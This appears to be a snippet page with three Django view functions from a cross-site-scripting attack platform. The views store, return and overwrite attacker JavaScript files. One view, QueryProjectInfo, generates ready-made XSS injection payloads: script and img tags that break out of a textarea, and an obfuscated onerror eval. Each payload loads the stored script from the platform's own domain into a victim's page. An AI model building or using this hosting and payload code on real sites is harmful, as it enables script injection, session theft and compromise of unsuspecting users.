Beispiel #1
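def GenerateProject(request):
    """Create a cross-site-script project: store the uploaded file and bind it to the user.

    Expects a POST whose JSON body carries ``javascript_data`` (base64 text),
    ``project_name`` and ``token``. The decoded data is written under the
    directory returned by ``GetJavaScriptFilePath().Result()`` using a
    server-generated file name, and the (file name, uid, project name) tuple is
    recorded through ``CrossSiteScriptProject().Write``.

    The outcome is reported in the ``code`` field of the JSON body (no HTTP
    status is set here): 200 on success, 403 when the token does not resolve to
    a uid or no data was supplied, 169 on any exception, 500 for non-POST.
    """
    RequestLogRecord(request, request_api="create_cross_site_script_project")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        # Parse the body once instead of once per field.
        Payload = json.loads(request.body)
        JavaScriptFileData = Payload["javascript_data"]  # base64-encoded file content from the front end
        ProjectName = Payload["project_name"]
        UserToken = Payload["token"]
        Uid = UserInfo().QueryUidWithToken(UserToken)  # resolve the session token to a uid
        if Uid is None or JavaScriptFileData is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })

        UserOperationLogRecord(request, request_api="create_cross_site_script_project", uid=Uid)

        # Decode before touching the filesystem: malformed base64 then fails
        # without leaving an empty file that has no database record.
        DecodedFileData = base64.b64decode(str(JavaScriptFileData).encode('utf-8'))

        # Resolved once and reused for the final path.
        JavaScriptSaveDirectory = GetJavaScriptFilePath().Result()

        # Draw random names until one is not already registered.
        # NOTE(review): the uniqueness check and the later Write() are separate
        # steps, so two concurrent requests could pick the same name — confirm
        # whether the database enforces uniqueness on file_name.
        while True:
            JavaScriptSaveFileName = randoms().result(5)
            if not CrossSiteScriptProject().RepeatInvestigation(file_name=JavaScriptSaveFileName):
                break

        # The file name is generated server-side; only the content is client-controlled.
        JavaScriptSaveRoute = JavaScriptSaveDirectory + JavaScriptSaveFileName
        with open(JavaScriptSaveRoute, 'wb') as f:
            f.write(DecodedFileData)
        CrossSiteScriptProject().Write(file_name=JavaScriptSaveFileName, uid=Uid, project_name=ProjectName)
        return JsonResponse({'message': "欧拉欧拉欧拉欧拉欧拉欧拉欧拉欧拉(๑•̀ㅂ•́)و✧", 'code': 200, })
    except Exception as e:
        # Deliberate catch-all: the error is logged and a generic failure code returned.
        ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_GenerateProject(def)", e)
        return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })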
Beispiel #2
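def QueryProjectInfo(request):
    """Return the stored file content and usage strings for one of the caller's projects.

    Expects a POST whose JSON body carries ``project_associated_file_name`` and
    ``token``. When the token resolves to a uid and
    ``CrossSiteScriptProject().AuthorityCheck`` confirms the file belongs to
    that uid, the file is read and returned base64-encoded together with
    several strings built from ``cross_site_script_uses_domain_names`` and the
    file name.

    The outcome is reported in the ``code`` field of the JSON body: 200 on
    success, 404 when the file is not owned by the caller, 403 when the token
    does not resolve to a uid, 169 on any exception, 500 for non-POST.
    """
    RequestLogRecord(request, request_api="query_cross_site_script_project_info")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        # Parse the body once instead of once per field.
        Payload = json.loads(request.body)
        ProjectAssociatedFileName = Payload["project_associated_file_name"]  # file name generated for the project
        UserToken = Payload["token"]
        Uid = UserInfo().QueryUidWithToken(UserToken)  # resolve the session token to a uid
        if Uid is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })

        UserOperationLogRecord(request, request_api="query_cross_site_script_project_info", uid=Uid)

        # The client-supplied name is concatenated into a filesystem path below.
        # Defence in depth: accept only a bare file name, so the read cannot
        # leave the storage directory even if the ownership lookup were lenient.
        IsPlainFileName = (
            isinstance(ProjectAssociatedFileName, str)
            and ProjectAssociatedFileName not in ("", ".", "..")
            and "/" not in ProjectAssociatedFileName
            and "\\" not in ProjectAssociatedFileName
        )
        # Ownership check: the (uid, file_name) pair must exist in the project table.
        if not IsPlainFileName or not CrossSiteScriptProject().AuthorityCheck(uid=Uid, file_name=ProjectAssociatedFileName):
            return JsonResponse({'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, })

        JavaScriptFilePath = GetJavaScriptFilePath().Result() + ProjectAssociatedFileName
        # Context manager closes the handle; the original left it open.
        with open(JavaScriptFilePath, 'r', encoding='UTF-8') as f:
            ReadFileData = f.read()
        return JsonResponse({'message': {"project_associated_file_data":base64.b64encode(ReadFileData.encode('utf-8')).decode('utf-8'),
                                         "the_first_use":"""</tExtArEa>'"><sCRiPt sRC=//"""+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+"></sCrIpT>",
                                         "the_second_use":"<sCRiPt/SrC=//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+">",
                                         "the_third_use":"<img sRC=//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+">",
                                         "exploit_path":"//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName,
                                         "coding_exploit":"""</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22%2F%2F"""+cross_site_script_uses_domain_names+"%2Fs%2F"+ProjectAssociatedFileName+"%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>"}, 'code': 200, })
    except Exception as e:
        # Deliberate catch-all: the error is logged and a generic failure code returned.
        ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_QueryProjectInfo(def)", e)
        return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })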
Beispiel #3
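def ModifyProject(request):
    """Overwrite the stored file of one of the caller's cross-site-script projects.

    Expects a POST whose JSON body carries ``project_associated_file_name``,
    ``project_associated_file_data`` (base64 text) and ``token``. When the
    token resolves to a uid and ``CrossSiteScriptProject().AuthorityCheck``
    confirms the file belongs to that uid, the decoded data replaces the file
    content.

    The outcome is reported in the ``code`` field of the JSON body: 200 on
    success, 404 when the file is not owned by the caller, 403 when the token
    does not resolve to a uid, 169 on any exception, 500 for non-POST.
    """
    RequestLogRecord(request, request_api="modify_cross_site_script_project")
    if request.method != "POST":
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
    try:
        # Parse the body once instead of once per field.
        Payload = json.loads(request.body)
        ProjectAssociatedFileName = Payload["project_associated_file_name"]  # file name generated for the project
        ProjectAssociatedFileData = Payload["project_associated_file_data"]  # base64-encoded replacement content
        UserToken = Payload["token"]
        Uid = UserInfo().QueryUidWithToken(UserToken)  # resolve the session token to a uid
        if Uid is None:
            return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })

        UserOperationLogRecord(request, request_api="modify_cross_site_script_project", uid=Uid)

        # The client-supplied name is concatenated into a filesystem path below.
        # Defence in depth: accept only a bare file name, so the write cannot
        # leave the storage directory even if the ownership lookup were lenient.
        IsPlainFileName = (
            isinstance(ProjectAssociatedFileName, str)
            and ProjectAssociatedFileName not in ("", ".", "..")
            and "/" not in ProjectAssociatedFileName
            and "\\" not in ProjectAssociatedFileName
        )
        # Ownership check: the (uid, file_name) pair must exist in the project table.
        if not IsPlainFileName or not CrossSiteScriptProject().AuthorityCheck(uid=Uid, file_name=ProjectAssociatedFileName):
            return JsonResponse({'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, })

        # Decode before opening: opening for write truncates the file, so a
        # decode failure inside the `with` block would wipe the existing content.
        DecodedFileData = base64.b64decode(str(ProjectAssociatedFileData).encode('utf-8')).decode('utf-8')

        JavaScriptFilePath = GetJavaScriptFilePath().Result() + ProjectAssociatedFileName
        with open(JavaScriptFilePath, 'w', encoding='UTF-8') as f:
            f.write(DecodedFileData)
        return JsonResponse({'message': "文件内容覆盖成功~", 'code': 200, })
    except Exception as e:
        # Deliberate catch-all: the error is logged and a generic failure code returned.
        ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_ModifyProject(def)", e)
        return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })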